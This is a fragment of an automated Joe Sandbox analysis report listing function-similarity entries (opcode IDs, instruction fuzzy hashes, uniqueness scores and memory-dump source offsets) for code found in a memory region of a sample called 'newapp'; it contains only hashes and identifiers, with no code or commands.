                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b16ce778e7a3898ab66dcf1e272a05f75ca121106e829e18052b2d7da809a6e5
                                                                • Instruction ID: 10314c56f929f561c267da7bb9a37a30517aa6f6ce06f24e643d1bc867926092
                                                                • Opcode Fuzzy Hash: b16ce778e7a3898ab66dcf1e272a05f75ca121106e829e18052b2d7da809a6e5
                                                                • Instruction Fuzzy Hash: 08416E35B00215EFDB04EBB0D898BAE77B2BF8D704F218519E506973A1DF34A846CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: efd0dec69d9effa7c708770b6f9aa4d3cebfc0a44d8e88d3d5ec6f3b191a9d96
                                                                • Instruction ID: 3187822565499bcb62111e2a1613ad7d6708c534435c970bbe8b375220beec04
                                                                • Opcode Fuzzy Hash: efd0dec69d9effa7c708770b6f9aa4d3cebfc0a44d8e88d3d5ec6f3b191a9d96
                                                                • Instruction Fuzzy Hash: CE31E734A042589FCB04EB74D854AAE7BB1EF89304F2180BAD945DB392CB349D05CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 13defbecc2ef76428e9d820addbf0247169e926629c3ae3ec83c15dc4785791b
                                                                • Instruction ID: 2fc98d57201c215bebc00a9ec22b9cdb18670b987a70e1dcb4fcbd2673f912bb
                                                                • Opcode Fuzzy Hash: 13defbecc2ef76428e9d820addbf0247169e926629c3ae3ec83c15dc4785791b
                                                                • Instruction Fuzzy Hash: 4331C634A042589FCB04EBB4D850AAF7BB1EF89304F21806AD919DB391CB349D05CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 99da04df7285442b7dc7f0b9d2a8922d570abe2132b49bb6a678bb9351fbd972
                                                                • Instruction ID: 270dd0a50fca58cb4a680773bde45deb8ae94d78615e00a956304dbb4bffb1cc
                                                                • Opcode Fuzzy Hash: 99da04df7285442b7dc7f0b9d2a8922d570abe2132b49bb6a678bb9351fbd972
                                                                • Instruction Fuzzy Hash: 532102302042519FDB159BB9D81075A7BE5AFC6318F2685BAD458CB792DF30DC46C781
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f89caddb840484f35a028c561820376cc76fc34dcd99e9835e4c63e1dcc9d25c
                                                                • Instruction ID: 4911be117a5c214446659988dd6ba11bd77bcdac663b6369f3464e2c1abbce41
                                                                • Opcode Fuzzy Hash: f89caddb840484f35a028c561820376cc76fc34dcd99e9835e4c63e1dcc9d25c
                                                                • Instruction Fuzzy Hash: D81126753001148FCB48EB38C464A6D33E2AF8962971604A8E90ACF7B1DF36DC86CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17b235a4e97bee036c8a5787ca26a73c4e6203327a790c7fa367ef81036a8122
                                                                • Instruction ID: 4f625bb568de72ebb152c4fb4a3f9d384d3dd698bdc3f2cacba14fb4010ed3e9
                                                                • Opcode Fuzzy Hash: 17b235a4e97bee036c8a5787ca26a73c4e6203327a790c7fa367ef81036a8122
                                                                • Instruction Fuzzy Hash: 5811A534E05205DFDB08EBA0E598BAD7BB2AF49309F218429E516E73A1DF349D05CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bad638d9f5f629512a8d5cf01f286cd95791c155a1d7598e4edc374911ffdbd1
                                                                • Instruction ID: 84d2b38059cfe198f38e04fad99a3a3b407a50a2cd95f65f8c3d570b309f3e7d
                                                                • Opcode Fuzzy Hash: bad638d9f5f629512a8d5cf01f286cd95791c155a1d7598e4edc374911ffdbd1
                                                                • Instruction Fuzzy Hash: A901AD71D00204DFCB48EFB4EC086AA7BB5BF08310B20856AE856D3291DB34D902CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7b2370ba09e00a159f2bca652b23001099251ed47aca459aafb88e2c984db9de
                                                                • Instruction ID: c37fbc57866bd79d4219c7a7019a77aba9afc4796155e0a35ab0759027305163
                                                                • Opcode Fuzzy Hash: 7b2370ba09e00a159f2bca652b23001099251ed47aca459aafb88e2c984db9de
                                                                • Instruction Fuzzy Hash: E8018175A04215DFCB48EFB8EC086AE7BB5FB08311B21856AE416D3290DB34C902CF94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%